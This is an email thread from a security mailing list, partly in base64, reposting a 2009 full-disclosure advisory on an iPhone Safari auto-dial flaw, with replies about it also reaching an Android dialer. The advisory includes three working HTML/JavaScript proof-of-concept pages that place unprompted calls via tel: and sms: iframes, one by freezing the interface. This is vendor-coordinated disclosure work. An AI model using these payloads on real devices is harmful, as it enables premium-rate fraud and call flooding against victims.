IDMuMCBzZWN1cml0eSBmaXhlcy4NCj4NCj5WdWxuZXJhYmlsaXR5IFJlcG9ydA0KPg0KPi0tLSBC
RUdJTiBBRFZJU09SWSAtLS0NCj4NCj5NYW51ZmFjdHVyZXI6IEFwcGxlICh3d3cuYXBwbGUuY29t
KQ0KPkRldmljZTogICAgICAgaVBob25lIDNHIChpUGhvbmUgMXN0IEdlbikNCj5GaXJtd2FyZTog
ICAgIDIuMSAocG9zc2libGUgZWFybGllciB2ZXJzaW9ucykNCj5EZXZpY2UgVHlwZTogIHNtYXJ0
IHBob25lDQo+DQo+U3Vic3lzdGVtczogU2FmYXJpIChhbmQgbW9iaWxlIHRlbGVwaG9ueSkNCj4N
Cj4tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPg0KPlNob3J0IG5hbWU6DQo+ICAgaVBo
b25lIFNhZmFyaSBwaG9uZS1hdXRvLWRpYWwgKHZ1bG5lcmFiaWxpdHkpDQo+DQo+VnVsbmVyYWJp
bGl0eSBjbGFzczoNCj4gICBhcHBsaWNhdGlvbiBsb2dpYyBidWcNCj4NCj5FeGVjdXRpdmUgU3Vt
bWFyeToNCj4gICBBIG1hbGljaW91cyB3ZWJzaXRlIGNhbiBpbml0aWF0ZSBhIHBob25lIGNhbGwg
d2l0aG91dCB0aGUgbmVlZCBvZiB1c2VyDQo+ICAgaW50ZXJhY3Rpb24uIFRoZSBkZXN0aW5hdGlv
biBwaG9uZSBudW1iZXIgaXMgY2hvc2VuIGJ5IHRoZSBhdHRhY2tlci4NCj4NCj5SaXNrOiBNRURJ
VU0tSElHSA0KPiAgIE1lZGl1bSB0byBoaWdoIHJpc2sgZHVlIHRvIHRoZSBwb3NzaWJpbGl0eSBv
ZiBmaW5hbmNpYWwgZ2FpbiB0aHJvdWdoDQo+ICAgdGhpcyBhdHRhY2sgYnkgY2FsbGluZyBvZiBw
cmVtaXVtIHJhdGUgbnVtYmVycyAoZS5nLiAxLTkwMCBpbiB0aGUNCj4gICBVLlMuKS4gRGVuaWFs
LW9mLXNlcnZpY2UgYWdhaW5zdCBhcmJpdHJhcnkgcGhvbmUgbnVtYmVycyB0aHJvdWdoDQo+ICAg
bWFzcy1jYWxsaW5nLiBVc2VyIGNhbm5vdCBwcmV2ZW50IGF0dGFjay4NCj4NCj4tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLQ0KPg0KPlJlcG9ydGVyOiBDb2xsaW4gTXVsbGluZXIgPGNvbGxp
bltBVF1tdWxsaW5lci5vcmc+DQo+DQo+LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCj4N
Cj5BZmZpbGlhdGlvbjogTVVsbGlORVIuT1JHIC8gdGhlIHRyaWZpbml0ZSBncm91cCAvIChGcmF1
bmhvZmVyIFNJVCkNCj4NCj4tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPg0KPlRpbWUg
bGluZToNCj4NCj4gICBPY3QuIDIwLiAyMDA4OiBSZXBvcnRlZCB2dWxuZXJhYmlsaXR5IHRvIHZl
bmRvci4NCj4gICBPY3QuIDIwLiAyMDA4OiBWZW5kb3IgYWNrbm93bGVkZ2VzIHJlY2VpdmluZyBv
dXIgZW1haWwuDQo+ICAgICAgICAgICAgICAgICAgTm90IGNvbW1lbnRpbmcgb24gdGhlIHZ1bG5l
cmFiaWxpdHkgaXRzZWxmLg0KPiAgIE9jdC4gMjcuIDIwMDg6IFNlbnQgdXBkYXRlIHRvIHZlbmRv
ciwgYWxzbyByZXF1ZXN0aW5nIGEgc3RhdHVzIHJlcG9ydC4NCj4gICBPY3QuIDI5LiAyMDA4OiBS
ZXBseSBmcm9tIHZlbmRvciBhY2tub3dsZWRnaW5nIHRoZSB2dWxuZXJhYmlsaXR5Lg0KPiAgIE9j
dC4gMzAuIDIwMDg6IFNlbnQgYWRkaXRpb25hbCBpbmZvcm1hdGlvbi4NCj4gICBOb3YuIDEzLiAy
MDA4OiBWZW5kZXIgc2F5cyB2dWxuZXJhYmlsaXR5IGlzIGZpeGVkIGluIHVwY29taW5nIE9TDQo+
ICAgICAgICAgICAgICAgICAgdmVyc2lvbi4NCj4gICBOb3YuIDIwLiAyMDA4OiBQdWJsaWMgZGlz
Y2xvc3VyZS4NCj4gICBKdW4uIDE4LiAyMDA5OiBGdWxsLURpc2Nsb3N1cmUuDQo+DQo+LS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCj4NCj5GaXg6DQo+DQo+ICAgaVBob25lIE9TIDIuMg0K
PiAgIGlQaG9uZSBPUyAyLjIuMQ0KPiAgIGlQaG9uZSBPUyAzLjANCj4JDQo+LS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0NCj4NCj5UZWNobmljYWwgRGV0YWlsczoNCj4NCj4gICBUaGUgU2Fm
YXJpIHZlcnNpb24gcnVubmluZyBvbiB0aGUgaVBob25lIHN1cHBvcnRzIGhhbmRsaW5nIHRoZSBU
RUwgWzFdDQo+ICAgcHJvdG9jb2wgdGhyb3VnaCBsYXVuY2hpbmcgdGhlIHRlbGVwaG9ueS9kaWFs
ZXIgYXBwbGljYXRpb24uIFRoaXMgaXMNCj4gICBkb25lIGJ5IHBhc3NpbmcgdGhlIHByb3ZpZGVk
IHBob25lIG51bWJlciB0byB0aGUgdGVsZXBob255DQo+ICAgYXBwbGljYXRpb24uIFVuZGVyIG5v
cm1hbCBjb25kaXRpb25zLCBsb2FkaW5nIGEgdGVsOiBVUkkgcmVzdWx0cyBpbiBhDQo+ICAgbWVz
c2FnZSBib3ggYXNraW5nIHRoZSB1c2VyJ3MgcGVybWlzc2lvbiB0byBjYWxsIHRoZSBnaXZlbiBu
dW1iZXIuIFRoZQ0KPiAgIHVzZXIgaXMgcHJlc2VudGVkIHdpdGggdGhlIHNpbXBsZSBjaG9pY2Ug
dG8gZWl0aGVyIHByZXNzIGNhbGwgb3INCj4gICBjYW5jZWwuDQo+DQo+ICAgQSBURUwgVVJJIGNh
biBiZSBvcGVuZWQgYXV0b21hdGljYWxseSBpZiB0aGUgVEVMIFVSSSBpcyB1c2VkIGFzIHRoZQ0K
PiAgIHNvdXJjZSBvZiBhbiBIVE1MIGlmcmFtZSBvciBmcmFtZSwgYXMgdGhlIFVSTCBvZiBhIG1l
dGEgcmVmcmVzaCwgYXMNCj4gICB0aGUgbG9jYXRpb24gb2YgYSBIVFRQIDMwWCByZWRpcmVjdCwg
YW5kIGFzIHRoZSBsb2NhdGlvbiBvZiB0aGUNCj4gICBjdXJyZW50IG9yIGEgbmV3IHdpbmRvdyB1
c2luZyBqYXZhc2NyaXB0Lg0KPg0KPiAgIFdlIGRpc2NvdmVyZWQgYSBzZWN1cml0eSB2dWxuZXJh
YmlsaXR5IHRoYXQgZGlzbWlzc2VzIHRoZSAiYXNrIGZvcg0KPiAgIHBlcm1pc3Npb24gdG8gY2Fs
bCIgZGlhbG9nIGluIGEgd2F5IHRoYXQgY2hvb3NlcyB0aGUgImNhbGwiIG9wdGlvbg0KPiAgIHJh
dGhlciB0aGFuIHRoZSAiY2FuY2VsIiBvcHRpb24uDQo+CQ0KPiAgIFRoaXMgY29uZGl0aW9uIG9j
Y3VycyBpZiBhIFRFTCBVUkkgaXMgYWN0aXZhdGVkIGF0IHRoZSBzYW1lIHRpbWUNCj4gICBTYWZh
cmkgaXMgY2xvc2VkIGJ5IGxhdW5jaGluZyBhbiBleHRlcm5hbCBhcHBsaWNhdGlvbiwgZm9yIGV4
YW1wbGUNCj4gICBsYXVuY2hpbmcgdGhlIFNNUyBhcHBsaWNhdGlvbiAoaW4gb3JkZXIgdG8gaGFu
ZGxlIGEgU01TIFVSSSBbMl0pLiBUaGUNCj4gICBTTVMgYXBwbGljYXRpb24gY2FuIGJlIGxhdW5j
aGVkIHRocm91Z2ggcGxhY2luZyBhIFNNUyBVUkkgYXMgdGhlDQo+ICAgc291cmNlIG9mIGFuIGlm
cmFtZS4gVGhpcyBpcyBzaG93biBpbiB0aGUgZmlyc3QgcHJvb2Ytb2YtY29uY2VwdA0KPiAgIGV4
cGxvaXQgYmVsb3cuDQo+CQ0KPiAgIEZ1cnRoZXIgaW52ZXN0aWdhdGlvbiBzaG93ZWQgdGhhdCB0
aGlzIGJlaGF2aW9yIGNhbiBiZSByZXByb2R1Y2VkIGJ5DQo+ICAgbGF1bmNoaW5nIG90aGVyIGFw
cGxpY2F0aW9ucyBzdWNoIGFzOiBNYXBzLCBZb3VUdWJlLCBhbmQgaVR1bmVzLg0KPiAgIExhdW5j
aGluZyB0aGVzZSBhcHBsaWNhdGlvbnMgY2FuIGJlIGFjaGlldmVkIHRocm91Z2ggbG9hZGluZyBz
cGVjaWFsDQo+ICAgVVJMcyB1c2luZyB0aGUgbWV0YSByZWZyZXNoIHRhZy4gVGhpcyBpcyBzaG93
biBpbiB0aGUgc2Vjb25kDQo+ICAgcHJvb2Ytb2YtY29uY2VwdCBleHBsb2l0IGJlbG93Lg0KPg0K
PiAgIFdlIGFsc28gZGlzY292ZXJlZCB0aGF0IHRoZSBidWcgY2FuIGFsc28gYmUgdHJpZ2dlcmVk
IHRocm91Z2ggcG9wdXANCj4gICB3aW5kb3dzIChlLmcuIGphdmFzY3JpcHQgYWxlcnQpLiBJbiB0
aGlzIHNpdHVhdGlvbiB0aGUgaW5pdGlhdGluZyBhcHANCj4gICBkb2VzIG5vdCBuZWVkIHRvIGJl
IHRlcm1pYW50ZWQgaW4gb3JkZXIgdG8gYWN0aXZlIHRoZSBjYWxsLg0KPgkNCj4gICBGaW5hbGx5
LCB3ZSBkaXNjb3ZlcmVkIGEgc2Vjb25kIGJ1ZyB0aGF0IGNhbiBiZSB1c2VkIHRvIHBlcmZvcm0N
Cj4gICBtYWxpY2lvdXMgcGhvbmUgY2FsbHMgdGhhdCBjYW5ub3QgYmUgcHJldmVudGVkIG9yIGNh
bmNlbGVkIGJ5IHRoZQ0KPiAgIHZpY3RpbS4gVGhpcyBidWcgYWxsb3dzIHRoZSBhdHRhY2tlciB0
byBmcmVleiB0aGUgR1VJIChncmFwaGljYWwgdXNlcg0KPiAgIGludGVyZmFjZSkgZm9yIGEgbnVt
YmVyIG9mIHNlY29uZHMuIFdoaWxlIHRoZSBHVUkgaXMgZnJvemVuIHRoZSBjYWxsDQo+ICAgcHJv
Z3Jlc3NlcyBpbgl0aGUgYmFja2dyb3VuZCBhbmQgY2Fubm90IGJlIHN0b3BwZWQgYnkgdGhlIHZp
Y3RpbSB1c2VyLg0KPiAgIEZyZWV6aW5nIHRoZSBHVUkgaXMgYWNoaWV2ZWQgYnkgcGFzc2luZyBh
ICJ2ZXJ5IGxvbmciIHBob25lIG51bWJlciB0bw0KPiAgIHRoZSBTTVMgYXBwbGljYXRpb24uIFRo
ZSBTTVMgYXBwbGljYXRpb24sIGltbWVkaWF0ZWx5IGFmdGVyIGJlaW5nDQo+ICAgc3RhcnRlZCwg
ZnJlZXplcyB0aGUgaVBob25lIEdVSS4gQWxzbyBzd2l0Y2hpbmcgb2ZmIHRoZSBpUGhvbmUgY2Fu
bm90DQo+ICAgYmUgcGVyZm9ybWVkIGZhc3QgZW5vdWdoIGluIG9yZGVyIHRvIHByZXZlbnQgdGhl
IG1hbGljaW91cyBjYWxsLg0KPgkNCj4NCj4gICBbMV0gaHR0cDovL3d3dy5yZmMtZWRpdG9yLm9y
Zy9yZmMvcmZjMzk2Ni50eHQNCj4gICBbMl0gaHR0cDovL3Rvb2xzLmlldGYub3JnL2h0bWwvZHJh
ZnQtYW50dGktZ3NtLXNtcy11cmwtMDQNCj4NCj4tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LQ0KPg0KPkZ1cnRoZXIgRGlzY3Vzc2lvbjoNCj4NCj4gICBUaGUgZGlhbGluZyBkaWFsb2cgaXMg
Y2xlYXJseSBzaG93biB0byB0aGUgdXNlciBhbHNvIHRoZSB1c2VyLCBpbiBtb3N0DQo+ICAgY2Fz
ZXMsIGNhbid0IHByZXNzIGNhbmNlbCBxdWljayBlbm91Z2ggaW4gb3JkZXIgdG8gc3RvcCB0aGUg
aW5pdGlhdGlvbg0KPiAgIG9mIHRoZSBjYWxsLiBPbmNlIHRoZSBleHRlcm5hbCBhcHBsaWNhdGlv
biBpcyBsYXVuY2hlZCwgdGhlIHRlbGVwaG9ueQ0KPiAgIGFwcGxpY2F0aW9uIGlzIHJ1bm5pbmcg
aW4gdGhlIGJhY2tncm91bmQgcGVyZm9ybWluZyB0aGUgY2FsbC4gT25seQ0KPiAgIHRoZSBjYWxs
IGZvcndhcmRpbmcgZGlhbG9nIChjb250YWluaW5nIHRoZSAiZGlzbWlzcyIgYnV0dG9uKSBpbmRp
Y2F0ZXMNCj4gICBhIGNhbGwgYmVpbmcgbWFkZS4NCj4NCj4tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLQ0KPg0KPlByb29mLW9mLUNvbmNlcHQgd2l0aCBwbGFpbiBIVE1MIHVzaW5nIHRoZSBT
TVMgYXBwbGljYXRpb246DQo+DQo+ICAgPGh0bWw+DQo+ICAgPGhlYWQ+DQo+ICAgPHRpdGxlPmlQ
aG9uZSBTYWZhcmkgcGhvbmUtYXV0by1kaWFsIEV4cGxvaXQgRGVtbyBieSBDb2xsaW4gTXVsbGlu
ZXINCj4gICA8L3RpdGxlPg0KPiAgIDwvaGVhZD4NCj4gICA8Ym9keT4NCj4gICA8aWZyYW1lIHNy
Yz0ic21zOisxNDA4OTc0ODM4OCIgV0lEVEg9NTAgSEVJR0hUPTEwPjwvaWZyYW1lPg0KPiAgIDxp
ZnJhbWUgc3JjPSJ0ZWw6KzE0MDg5NzQ4Mzg4IiBXSURUSD01MCBIRUlHSFQ9MTA+PC9pZnJhbWU+
DQo+ICAgPCEtLSBzZWNvbmQgaWZyYW1lIGlzIHRvIGF0dGFjayBxdWljayB1c2VycyB3aG8gbWFu
YWdlIHRvIGNsb3NlIHRoZQ0KPiAgICAgICAgZmlyc3QgY2FsbC1kaWFsb2cgLy8tLT4NCj4gICA8
aWZyYW1lIHNyYz0idGVsOisxNDA4OTc0ODM4OCIgV0lEVEg9NTAgSEVJR0hUPTEwPjwvaWZyYW1l
Pg0KPiAgIDwvYm9keT4NCj4gICA8L2h0bWw+DQo+DQo+UHJvb2Ytb2YtQ29uY2VwdCB1c2luZyBq
YXZhc2NyaXB0IGFuZCB0aGUgTWFwcyBhcHBsaWNhdGlvbjoNCj4NCj4gICA8aHRtbD4NCj4gICA8
aGVhZD4NCj4gICA8dGl0bGU+aVBob25lIFNhZmFyaSBwaG9uZS1hdXRvLWRpYWwgRXhwbG9pdCBE
ZW1vIGJ5IENvbGxpbiBNdWxsaW5lcg0KPiAgIDwvdGl0bGU+DQo+ICAgPG1ldGEgaHR0cC1lcXVp
dj0icmVmcmVzaCIgY29udGVudD0iMDsNCj4gICBVUkw9aHR0cDovL21hcHMuZ29vZ2xlLmRlL21h
cHM/cT1yaGVpbnN0cmFzc2UrNzUrZGFybXN0YWR0Ij4NCj4gICA8L2hlYWQ+DQo+ICAgPGJvZHk+
DQo+ICAgPHNjcmlwdCBsYW5nPWphdmFzY3JpcHQ+DQo+ICAgZnVuY3Rpb24gYSgpIHsNCj4gICAg
ZG9jdW1lbnQud3JpdGUoIjxpZnJhbWUgc3JjPVwidGVsOisxNDA4OTc0ODM4OFwiIFdJRFRIPTUw
IA0KPkhFSUdIVD0xMD48L2lmcmFtZT4iKTsNCj4gICB9DQo+ICAgc2V0VGltZW91dCgiYSgpIiwg
MTAwKTsNCj4gICA8L3NjcmlwdD4NCj4gICA8L2JvZHk+DQo+ICAgPC9odG1sPg0KPgkNCj5Qcm9v
Zi1vZi1Db25jZXB0IGF0dGFjayB3aGVyZSB0aGUgdmljdGltIHVzZXIgY2Fubm90IHN0b3AgdGhl
IG1hbGljaW91cyANCj5waG9uZSBjYWxsOg0KPg0KPiAgIDxodG1sPg0KPiAgIDxoZWFkPg0KPiAg
IDx0aXRsZT5pUGhvbmUgU2FmYXJpIHBob25lLWF1dG8tZGlhbCBFeHBsb2l0IERlbW8gYnkgQ29s
bGluIE11bGxpbmVyDQo+ICAgPC90aXRsZT4NCj4gICA8L2hlYWQ+DQo+ICAgPGJvZHk+DQo+ICAg
PHNjcmlwdCBsYW5nPWphdmFzY3JpcHQ+DQo+ICAgbCA9ICI8aWZyYW1lIHNyYz1cInNtczoiOw0K
PiAgIGZvciAoaSA9IDA7IGkgPCAxMDAwMDsgaSsrKSB7DQo+ICAgICAgICAgICBsID0gbCArICIz
MzQwOTQ4MDM0Mjk4MjMyIjsNCj4gICB9DQo+ICAgbCA9IGwgKyAiXCIgd2lkdGg9MTAgaGVpZ2h0
PTEwPjwvaWZyYW1lPjxpZnJhbWUNCj4gICBzcmM9XCJ0ZWw6KzE0MDg5NzQ4Mzg4XCIgaGVpZ2h0
PTEwIHdpZHRoPTEwPjwvaWZyYW1lPiI7DQo+ICAgZG9jdW1lbnQud3JpdGUobCk7DQo+ICAgPC9z
Y3JpcHQ+DQo+ICAgPC9ib2R5Pg0KPiAgIDwvaHRtbD4NCj4NCj4tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLQ0KPg0KPk1vcmUgRGV0YWlsZWQgSW5mb3JtYXRpb246DQo+DQo+ICBEZW1vIHZp
ZGVvIGF2YWlsYWJsZSBhdDoNCj4gICBodHRwOi8vd3d3Lm11bGxpbmVyLm9yZy9pcGhvbmUvDQo+
DQo+ICBBZHZpc29yaWVzOg0KPiAgIGh0dHA6Ly93d3cubXVsbGluZXIub3JnL3NlY3VyaXR5L2Fk
dmlzb3JpZXMvDQo+DQo+LS0tIEVORCBBRFZJU09SWSAtLS0NCj4NCj4NCj4tLSANCj5Db2xsaW4g
Ui4gTXVsbGluZXIgPGNvbGxpbkBiZXRhdmVyc2lvbi5uZXQ+DQo+aW5mby9wZ3A6IGZpbmdlciBj
b2xsaW5AYmV0YXZlcnNpb24ubmV0DQo+SWYgQmlsbCBHYXRlcyBoYWQgYSBuaWNrZWwgZm9yIGV2
ZXJ5IHRpbWUgV2luZG93cyBjcmFzaGVkLi4uIE9oIHdhaXQsIGhlIA0KPmRvZXMhDQo=

------OOQR8OIVASFMLRMIKQ9G04MAIHM98G--



From: Collin Mulliner collin@betaversion.net
Sent: Thu 18. Jun 2009 19:29
Mike,

just getting to the phone dialer is not a bug! That is what the tel: 
protocol is for. All most all mobile phones implement this, every time 
you open a tel: URL you will get to the dialer in some way.

Collin

Mike Ely wrote:
> Confirmed on the T-Mobile G1 email app running OS version 1.5.  Was wondering why my phone stepped on email to dial out when I read this email and then I read the subject line ;)
> 
> FWIW, it didnt actually dial, just loaded the dialer with that number ready.  
> 
> Looks like this is a Webkit bug, not Safari. 
> 
> Collin Mulliner <collin@betaversion.net> wrote:
> 
>> Released since Apple published the iPhone 3.0 security fixes.
>>
>> Vulnerability Report
>>
>> --- BEGIN ADVISORY ---
>>
>> Manufacturer: Apple (www.apple.com)
>> Device:       iPhone 3G (iPhone 1st Gen)
>> Firmware:     2.1 (possible earlier versions)
>> Device Type:  smart phone
>>
>> Subsystems: Safari (and mobile telephony)
>>
>> -----------------------------
>>
>> Short name:
>>   iPhone Safari phone-auto-dial (vulnerability)
>>
>> Vulnerability class:
>>   application logic bug
>>
>> Executive Summary:
>>   A malicious website can initiate a phone call without the need of user
>>   interaction. The destination phone number is chosen by the attacker.
>>
>> Risk: MEDIUM-HIGH
>>   Medium to high risk due to the possibility of financial gain through
>>   this attack by calling of premium rate numbers (e.g. 1-900 in the
>>   U.S.). Denial-of-service against arbitrary phone numbers through
>>   mass-calling. User cannot prevent attack.
>>
>> -----------------------------
>>
>> Reporter: Collin Mulliner <collin[AT]mulliner.org>
>>
>> -----------------------------
>>
>> Affiliation: MUlliNER.ORG / the trifinite group / (Fraunhofer SIT)
>>
>> -----------------------------
>>
>> Time line:
>>
>>   Oct. 20. 2008: Reported vulnerability to vendor.
>>   Oct. 20. 2008: Vendor acknowledges receiving our email.
>>                  Not commenting on the vulnerability itself.
>>   Oct. 27. 2008: Sent update to vendor, also requesting a status report.
>>   Oct. 29. 2008: Reply from vendor acknowledging the vulnerability.
>>   Oct. 30. 2008: Sent additional information.
>>   Nov. 13. 2008: Vender says vulnerability is fixed in upcoming OS
>>                  version.
>>   Nov. 20. 2008: Public disclosure.
>>   Jun. 18. 2009: Full-Disclosure.
>>
>> -----------------------------
>>
>> Fix:
>>
>>   iPhone OS 2.2
>>   iPhone OS 2.2.1
>>   iPhone OS 3.0
>> 	
>> -----------------------------
>>
>> Technical Details:
>>
>>   The Safari version running on the iPhone supports handling the TEL [1]
>>   protocol through launching the telephony/dialer application. This is
>>   done by passing the provided phone number to the telephony
>>   application. Under normal conditions, loading a tel: URI results in a
>>   message box asking the users permission to call the given number. The
>>   user is presented with the simple choice to either press call or
>>   cancel.
>>
>>   A TEL URI can be opened automatically if the TEL URI is used as the
>>   source of an HTML iframe or frame, as the URL of a meta refresh, as
>>   the location of a HTTP 30X redirect, and as the location of the
>>   current or a new window using javascript.
>>
>>   We discovered a security vulnerability that dismisses the "ask for
>>   permission to call" dialog in a way that chooses the "call" option
>>   rather than the "cancel" option.
>> 	
>>   This condition occurs if a TEL URI is activated at the same time
>>   Safari is closed by launching an external application, for example
>>   launching the SMS application (in order to handle a SMS URI [2]). The
>>   SMS application can be launched through placing a SMS URI as the
>>   source of an iframe. This is shown in the first proof-of-concept
>>   exploit below.
>> 	
>>   Further investigation showed that this behavior can be reproduced by
>>   launching other applications such as: Maps, YouTube, and iTunes.
>>   Launching these applications can be achieved through loading special
>>   URLs using the meta refresh tag. This is shown in the second
>>   proof-of-concept exploit below.
>>
>>   We also discovered that the bug can also be triggered through popup
>>   windows (e.g. javascript alert). In this situation the initiating app
>>   does not need to be termianted in order to active the call.
>> 	
>>   Finally, we discovered a second bug that can be used to perform
>>   malicious phone calls that cannot be prevented or canceled by the
>>   victim. This bug allows the attacker to freez the GUI (graphical user
>>   interface) for a number of seconds. While the GUI is frozen the call
>>   progresses in	the background and cannot be stopped by the victim user.
>>   Freezing the GUI is achieved by passing a "very long" phone number to
>>   the SMS application. The SMS application, immediately after being
>>   started, freezes the iPhone GUI. Also switching off the iPhone cannot
>>   be performed fast enough in order to prevent the malicious call.
>> 	
>>
>>   [1] http://www.rfc-editor.org/rfc/rfc3966.txt
>>   [2] http://tools.ietf.org/html/draft-antti-gsm-sms-url-04
>>
>> -----------------------------
>>
>> Further Discussion:
>>
>>   The dialing dialog is clearly shown to the user also the user, in most
>>   cases, cant press cancel quick enough in order to stop the initiation
>>   of the call. Once the external application is launched, the telephony
>>   application is running in the background performing the call. Only
>>   the call forwarding dialog (containing the "dismiss" button) indicates
>>   a call being made.
>>
>> -----------------------------
>>
>> Proof-of-Concept with plain HTML using the SMS application:
>>
>>   <html>
>>   <head>
>>   <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
>>   </title>
>>   </head>
>>   <body>
>>   <iframe src="sms:+14089748388" WIDTH=50 HEIGHT=10></iframe>
>>   <iframe src="tel:+14089748388" WIDTH=50 HEIGHT=10></iframe>
>>   <!-- second iframe is to attack quick users who manage to close the
>>        first call-dialog //-->
>>   <iframe src="tel:+14089748388" WIDTH=50 HEIGHT=10></iframe>
>>   </body>
>>   </html>
>>
>> Proof-of-Concept using javascript and the Maps application:
>>
>>   <html>
>>   <head>
>>   <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
>>   </title>
>>   <meta http-equiv="refresh" content="0;
>>   URL=http://maps.google.de/maps?q=rheinstrasse+75+darmstadt">
>>   </head>
>>   <body>
>>   <script lang=javascript>
>>   function a() {
>>    document.write("<iframe src="tel:+14089748388" WIDTH=50 
>> HEIGHT=10></iframe>");
>>   }
>>   setTimeout("a()", 100);
>>   </script>
>>   </body>
>>   </html>
>> 	
>> Proof-of-Concept attack where the victim user cannot stop the malicious 
>> phone call:
>>
>>   <html>
>>   <head>
>>   <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
>>   </title>
>>   </head>
>>   <body>
>>   <script lang=javascript>
>>   l = "<iframe src="sms:";
>>   for (i = 0; i < 10000; i++) {
>>           l = l + "3340948034298232";
>>   }
>>   l = l + "" width=10 height=10></iframe><iframe
>>   src="tel:+14089748388" height=10 width=10></iframe>";
>>   document.write(l);
>>   </script>
>>   </body>
>>   </html>
>>
>> -----------------------------
>>
>> More Detailed Information:
>>
>>  Demo video available at:
>>   http://www.mulliner.org/iphone/
>>
>>  Advisories:
>>   http://www.mulliner.org/security/advisories/
>>
>> --- END ADVISORY ---
>>
>>
>> -- 
>> Collin R. Mulliner <collin@betaversion.net>
>> info/pgp: finger collin@betaversion.net
>> If Bill Gates had a nickel for every time Windows crashed... Oh wait, he 
>> does!


-- 
Collin R. Mulliner <collin@betaversion.net>
info/pgp: finger collin@betaversion.net
C gives you enough rope to hang yourself. C++ also gives you the tree 
object to tie it to.


From: Mike Ely me@taupehat.com
Sent: Thu 18. Jun 2009 14:07
------OOQ6QVNMQ89GSPKM03TM81BMDDCI85
Content-Type: text/plain;
 charset=utf-8
Content-Transfer-Encoding: base64

UGVyaGFwcyBub3QgZ2V0dGluZyB0byB0aGUgZGlhbGVyLCBidXQgaGF2aW5nIHRoZSBkaWFsZXIg
bGF1bmNoIGF1dG9tYXRpY2FsbHkganVzdCBmcm9tIHZpZXdpbmcgYW4gZW1haWw/CgpDb2xsaW4g
TXVsbGluZXIgPGNvbGxpbkBiZXRhdmVyc2lvbi5uZXQ+IHdyb3RlOgoKPk1pa2UsDQo+DQo+anVz
dCBnZXR0aW5nIHRvIHRoZSBwaG9uZSBkaWFsZXIgaXMgbm90IGEgYnVnISBUaGF0IGlzIHdoYXQg
dGhlIHRlbDogDQo+cHJvdG9jb2wgaXMgZm9yLiBBbGwgbW9zdCBhbGwgbW9iaWxlIHBob25lcyBp
bXBsZW1lbnQgdGhpcywgZXZlcnkgdGltZSANCj55b3Ugb3BlbiBhIHRlbDogVVJMIHlvdSB3aWxs
IGdldCB0byB0aGUgZGlhbGVyIGluIHNvbWUgd2F5Lg0KPg0KPkNvbGxpbg0KPg0KPk1pa2UgRWx5
IHdyb3RlOg0KPj4gQ29uZmlybWVkIG9uIHRoZSBULU1vYmlsZSBHMSBlbWFpbCBhcHAgcnVubmlu
ZyBPUyB2ZXJzaW9uIDEuNS4gIFdhcyB3b25kZXJpbmcgd2h5IG15IHBob25lIHN0ZXBwZWQgb24g
ZW1haWwgdG8gZGlhbCBvdXQgd2hlbiBJIHJlYWQgdGhpcyBlbWFpbCBhbmQgdGhlbiBJIHJlYWQg
dGhlIHN1YmplY3QgbGluZSA7KQ0KPj4gDQo+PiBGV0lXLCBpdCBkaWRuJ3QgYWN0dWFsbHkgZGlh
bCwganVzdCBsb2FkZWQgdGhlIGRpYWxlciB3aXRoIHRoYXQgbnVtYmVyIHJlYWR5LiAgDQo+PiAN
Cj4+IExvb2tzIGxpa2UgdGhpcyBpcyBhIFdlYmtpdCBidWcsIG5vdCBTYWZhcmkuIA0KPj4gDQo+
PiBDb2xsaW4gTXVsbGluZXIgPGNvbGxpbkBiZXRhdmVyc2lvbi5uZXQ+IHdyb3RlOg0KPj4gDQo+
Pj4gUmVsZWFzZWQgc2luY2UgQXBwbGUgcHVibGlzaGVkIHRoZSBpUGhvbmUgMy4wIHNlY3VyaXR5
IGZpeGVzLg0KPj4+DQo+Pj4gVnVsbmVyYWJpbGl0eSBSZXBvcnQNCj4+Pg0KPj4+IC0tLSBCRUdJ
TiBBRFZJU09SWSAtLS0NCj4+Pg0KPj4+IE1hbnVmYWN0dXJlcjogQXBwbGUgKHd3dy5hcHBsZS5j
b20pDQo+Pj4gRGV2aWNlOiAgICAgICBpUGhvbmUgM0cgKGlQaG9uZSAxc3QgR2VuKQ0KPj4+IEZp
cm13YXJlOiAgICAgMi4xIChwb3NzaWJsZSBlYXJsaWVyIHZlcnNpb25zKQ0KPj4+IERldmljZSBU
eXBlOiAgc21hcnQgcGhvbmUNCj4+Pg0KPj4+IFN1YnN5c3RlbXM6IFNhZmFyaSAoYW5kIG1vYmls
ZSB0ZWxlcGhvbnkpDQo+Pj4NCj4+PiAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPj4+
DQo+Pj4gU2hvcnQgbmFtZToNCj4+PiAgIGlQaG9uZSBTYWZhcmkgcGhvbmUtYXV0by1kaWFsICh2
dWxuZXJhYmlsaXR5KQ0KPj4+DQo+Pj4gVnVsbmVyYWJpbGl0eSBjbGFzczoNCj4+PiAgIGFwcGxp
Y2F0aW9uIGxvZ2ljIGJ1Zw0KPj4+DQo+Pj4gRXhlY3V0aXZlIFN1bW1hcnk6DQo+Pj4gICBBIG1h
bGljaW91cyB3ZWJzaXRlIGNhbiBpbml0aWF0ZSBhIHBob25lIGNhbGwgd2l0aG91dCB0aGUgbmVl
ZCBvZiB1c2VyDQo+Pj4gICBpbnRlcmFjdGlvbi4gVGhlIGRlc3RpbmF0aW9uIHBob25lIG51bWJl
ciBpcyBjaG9zZW4gYnkgdGhlIGF0dGFja2VyLg0KPj4+DQo+Pj4gUmlzazogTUVESVVNLUhJR0gN
Cj4+PiAgIE1lZGl1bSB0byBoaWdoIHJpc2sgZHVlIHRvIHRoZSBwb3NzaWJpbGl0eSBvZiBmaW5h
bmNpYWwgZ2FpbiB0aHJvdWdoDQo+Pj4gICB0aGlzIGF0dGFjayBieSBjYWxsaW5nIG9mIHByZW1p
